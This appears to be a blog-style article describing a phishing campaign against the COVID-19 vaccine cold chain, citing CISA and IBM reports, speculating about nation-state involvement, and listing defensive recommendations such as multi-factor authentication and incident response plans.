COVID-19 vaccines need to be kept cold until they are administered to patients. The COVID-19 cold chain continues to face challenges with distribution while creating opportunities for criminals to compromise the distribution of the vaccine. Therefore, here we explore the latest phishing campaign targeting the COVID-19 supply chain.
Who is at Risk
According to the Cybersecurity Infrastructure and Security Agency, criminals are positioning themselves to target the cold chain and transportation of the coronavirus vaccine. According to the agency, the phishing campaign targets agencies and organizations supporting the Cold Chain Equipment Optimization Platform.
These criminals are seeking to infiltrate the systems of enterprises within the cold chain network. If successful, their attacks could expose critical information of these organizations.
For example, a cyberattack likely involving ransomware has targeted Americold Realty Trust, an Atlanta-based cold storage company. These kinds of attacks can cause significant disruptions to the vaccine supply chain, leading to public health and economic consequences.
IBM reported on a very sophisticated attack on the cold chain in December. The attack on the cold chain was initiated through spoofing emails imitating an executive from a vaccine cold-chain provider called Haier Biomedical. The criminals sent emails to executives who were likely in the vaccine cold supply chain, in sales, procurement, IT, and finance. Additionally, the phishing campaign targeted the help and support pages of some organizations in the cold chain.
According to IBM, the attack could have been an attempt to gather credentials that would allow the attackers to gain future access to the network and sensitive information about the COVID-19 cold chain.
Based on the phishing emails, the attacker requested quotations related to the Cold Chain Equipment Optimization Platform. Furthermore, the email contained attachments which required credentials before the recipients could access the material.
Such an attack, if successful, can go undetected for a long time and expose the attacked organizations to massive data breaches. Furthermore, it would allow hackers to conduct extensive cyber espionage and leave a door open for future attacks and access to sensitive information.
The Entity behind the Attack
The nature of the attack suggests that a nation-state was behind the attack. These attacks were very precise in their targeting, suggesting that an individual would not have sufficient motivation or resources to carry it out.
The attack targeted key components and participants in the vaccine cold chain including:
- The EC Directorate-General for Taxation and Customs Union, which would compromise high-value targets in and beyond the EU
- Companies manufacturing solar panels, which would be used to preserve vaccines in areas without reliable power. Consequently, an attack on these organizations would result in intellectual property theft. In turn, this would result in black market trade of stolen vaccine shipping equipment.
An individual with information about the vaccine supply chain could sell those insights in the black market. However, such information presents more value to a nation-state, which stands to benefit economically.
Safeguarding the Cold Chain
Companies and organizations in the COVID-19 cold chain must remain vigilant to ensure that they do not fall victim to phishing scams. Moreover, they should keep abreast of the recommended best practices to avoid falling for these scams. Some recommendations include:
- The creation of incident report plans
- Threat-sharing initiatives
- Assessing risks introduced by third-party partnerships
- Using multi-factor authentication across the organization